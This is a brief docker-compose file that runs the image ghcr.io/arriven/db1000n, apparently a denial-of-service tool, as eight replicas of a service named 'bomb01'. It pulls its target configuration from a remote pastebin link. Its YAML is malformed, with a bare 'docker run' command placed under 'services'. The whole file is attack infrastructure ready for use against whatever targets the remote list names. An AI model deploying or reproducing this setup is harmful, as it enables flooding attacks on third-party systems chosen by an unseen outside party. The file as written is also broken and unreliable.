version: '3'

services:

  docker run --rm --pull always ghcr.io/arriven/db1000n ./db1000n -c https://pastebin.com/raw/UU6eQ2hV

  bomb01:
    image: ghcr.io/arriven/db1000n
    command: ./db1000n -c https://pastebin.com/raw/UU6eQ2hV
    deploy:
      replicas: 8
